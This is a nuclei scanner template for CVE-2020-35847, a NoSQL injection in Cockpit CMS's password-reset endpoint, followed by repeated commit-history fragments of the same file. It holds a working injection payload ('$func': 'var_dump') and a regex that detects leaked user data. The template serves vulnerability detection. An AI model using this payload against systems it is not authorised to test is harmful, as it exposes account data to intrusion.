nuclei-templates/cves/2020/CVE-2020-35847.yaml

id: CVE-2020-35847

info:
  name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
  author: dwisiswant0
  severity: critical
  description: |
    resetpassword method of the Auth controller,
    which is responsible for changing the user password using the reset token.
  reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
  tags: cve,cve2020,nosqli,sqli

requests:
  - method: POST
    path:
      - "{{BaseURL}}/auth/requestreset"
    headers:
      Content-Type: application/json
    body: |
      {
        "user": {
          "$func": "var_dump"
        }
      }

    matchers:
      - type: regex
        part: body
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`id: CVE-2020-35847`

			`info:`
			`name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword`
			`author: dwisiswant0`
			`severity: critical`
			`description: \|`
			`resetpassword method of the Auth controller,`
			`which is responsible for changing the user password using the reset token.`
			`reference: https://swarm.ptsecurity.com/rce-cockpit-cms/`
			`tags: cve,cve2020,nosqli,sqli`

			`requests:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/auth/requestreset"`
			`headers:`
			`Content-Type: application/json`
			`body: \|`
			`{`
			`"user": {`
			`"$func": "var_dump"`
			`}`
			`}`
Adding status matcher 2021-04-13 20:07:04 +00:00
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'`